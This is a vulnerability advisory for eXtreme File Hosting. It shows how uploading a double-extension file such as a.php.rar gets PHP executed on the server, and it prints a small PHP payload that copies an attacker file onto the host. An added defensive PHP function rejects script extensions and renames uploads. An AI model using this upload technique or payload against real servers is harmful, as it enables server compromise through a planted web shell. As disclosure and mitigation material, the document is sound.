A security bug has been discovered in eXtreme File Hosting which allows an attacker to upload files and obtain a shell on the server with a PHP shell.
Bug: this program, written in PHP, lets users upload zip or rar files. An attacker can upload a file named a.php.rar that contains:
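<?php
// Source of the copy; the value is empty in the advisory as published.
$file = '';
// Name the copied file is written under on the host.
$newfile = 'evile_file.php';
// copy() returns false on failure.
if (!copy($file, $newfile)) {
    echo "failed to copy $file\n";
} else {
    echo "K file copy in victim host";
}
?>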
The attacker uploads it and then clicks the download link; the file is then run instead of being downloaded.
After a.php.rar runs, evile_file.php is copied onto the victim host and the attacker can use it to attack the server.
Solution: disable rar file uploading in the settings.
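
An upload check that goes further than disabling rar alone, as an added example (not eXtreme File Hosting code): it assumes the web server may treat any dot-separated part of a name such as a.php.rar as a script extension, so it rejects such names and stores accepted files under a generated name. The function name, constants and extension lists are hypothetical, and the file names in the demo loop are constructed.

```php
<?php
// Added example, not part of eXtreme File Hosting. All names here are hypothetical.

// Only archive type still accepted once rar is disabled, as the advisory advises.
const ALLOWED_FINAL_EXT = ['zip'];

// Extensions a web server may map to a script handler (assumed list, extend per server).
const SCRIPT_EXT = ['php', 'php3', 'php4', 'php5', 'php7', 'phtml', 'phar', 'pht',
                    'cgi', 'pl', 'py', 'asp', 'aspx', 'jsp', 'shtml', 'htaccess'];

/**
 * Return a safe storage name for an upload, or null if it must be rejected.
 */
function safe_upload_name(string $clientName): ?string
{
    // Drop any client-supplied directory part, for both separator styles.
    $base = basename(str_replace('\\', '/', $clientName));
    if ($base === '' || strpos($base, "\0") !== false) {
        return null;
    }

    $parts = explode('.', strtolower($base));
    if (count($parts) < 2) {
        return null;                       // no extension at all
    }

    // The last extension must be on the allow-list.
    $final = array_pop($parts);
    if (!in_array($final, ALLOWED_FINAL_EXT, true)) {
        return null;
    }

    // Every inner extension (a.PHP.zip) is checked too, not just the last one.
    array_shift($parts);                   // discard the stem
    foreach ($parts as $inner) {
        if (in_array($inner, SCRIPT_EXT, true)) {
            return null;
        }
    }

    // Never store under the client's name: keep only the vetted extension.
    return bin2hex(random_bytes(16)) . '.' . $final;
}

// Constructed sample names, including the one from the advisory.
foreach (['a.php.rar', 'a.php.zip', 'notes.PhTml.zip', 'backup.zip'] as $name) {
    printf("%-16s => %s\n", $name, safe_upload_name($name) ?? 'REJECTED');
}
```

Only backup.zip is accepted here. Storing uploads outside the web root and streaming them through a download script keeps a stored file from ever being requested by its own URL.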
Underlying OS: Linux (Any), UNIX (Any), Windows (Any)
software: eXtreme File Hosting
site: http://www.extremepow.com
Reported By: hamed bazargani (hamed.bazargani (AT) gmail (DOT) com) from I.R. Iran and all Iranian whitehat hackers